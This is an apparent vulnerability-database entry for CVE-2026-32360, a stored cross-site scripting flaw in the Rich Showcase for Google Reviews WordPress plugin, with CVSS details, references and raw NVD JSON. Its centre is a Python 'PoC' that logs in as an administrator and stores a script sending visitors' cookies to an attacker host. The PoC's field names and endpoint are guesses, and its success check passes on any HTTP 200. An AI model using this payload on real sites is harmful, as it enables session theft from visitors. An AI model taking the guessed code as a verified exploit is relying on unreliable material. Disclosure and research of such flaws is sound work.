CVE-2026-32360

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richplugins Rich Showcase for Google Reviews widget-google-reviews allows Stored XSS.This issue affects Rich Showcase for Google Reviews: from n/a through <= 6.9.4.3.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

widget-google-reviews (Rich Showcase for Google Reviews) <= 6.9.4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-32360 PoC - WordPress Rich Showcase for Google Reviews Stored XSS
# Affected Component: widget-google-reviews plugin <= 6.9.4.3
# Attack Type: Stored Cross-Site Scripting (XSS)

import requests
import sys
from urllib.parse import quote

# Target WordPress site with vulnerable plugin
TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "admin"  # High-privilege user
PASSWORD = "password"

# Malicious XSS payload
XSS_PAYLOAD = "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>"

def exploit_stored_xss():
    """
    Exploit the stored XSS vulnerability in Rich Showcase for Google Reviews plugin.
    This PoC demonstrates how an attacker with high privileges can inject
    malicious JavaScript code that will be stored and executed for all visitors.
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress as high-privilege user
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/'
    }
    
    login_response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed!")
        return False
    
    print("[+] Successfully logged in as high-privilege user")
    
    # Step 2: Access the plugin settings page where Google Reviews are configured
    # The vulnerable endpoint is typically in the plugin's admin interface
    plugin_settings_url = f"{TARGET_URL}/wp-admin/admin.php?page=widget-google-reviews"
    
    # Step 3: Inject the XSS payload into the Google Reviews widget settings
    # This could be in the business name, review text, or other configurable fields
    exploit_data = {
        'gReviews_business_name': f"Test Business {XSS_PAYLOAD}",
        'gReviews_review_text': f"Great service! {XSS_PAYLOAD}",
        'submit': 'Save Changes'
    }
    
    exploit_response = session.post(plugin_settings_url, data=exploit_data)
    
    # Step 4: Verify the XSS payload was stored
    if XSS_PAYLOAD in exploit_response.text or exploit_response.status_code == 200:
        print("[+] XSS payload successfully injected!")
        print("[+] Payload stored in database and will execute for all page visitors")
        print(f"[+] Payload URL-encoded: {quote(XSS_PAYLOAD)}")
        return True
    else:
        print("[-] Failed to inject payload - plugin may have been patched")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-32360 PoC - Stored XSS in widget-google-reviews")
    print("=" * 60)
    exploit_stored_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32360
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32360
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32360/
[4] VulDB https://vuldb.com/cve/CVE-2026-32360
[5] https://patchstack.com/database/Wordpress/Plugin/widget-google-reviews/vulnerability/wordpress-rich-showcase-for-google-reviews-plugin-6-9-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32360", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:49.797", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richplugins Rich Showcase for Google Reviews widget-google-reviews allows Stored XSS.This issue affects Rich Showcase for Google Reviews: from n/a through <= 6.9.4.3."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en richplugins Rich Showcase for Google Reviews widget-google-reviews permite XSS Almacenado. Este problema afecta a Rich Showcase for Google Reviews: desde n/a hasta <= 6.9.4.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/widget-google-reviews/vulnerability/wordpress-rich-showcase-for-google-reviews-plugin-6-9-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}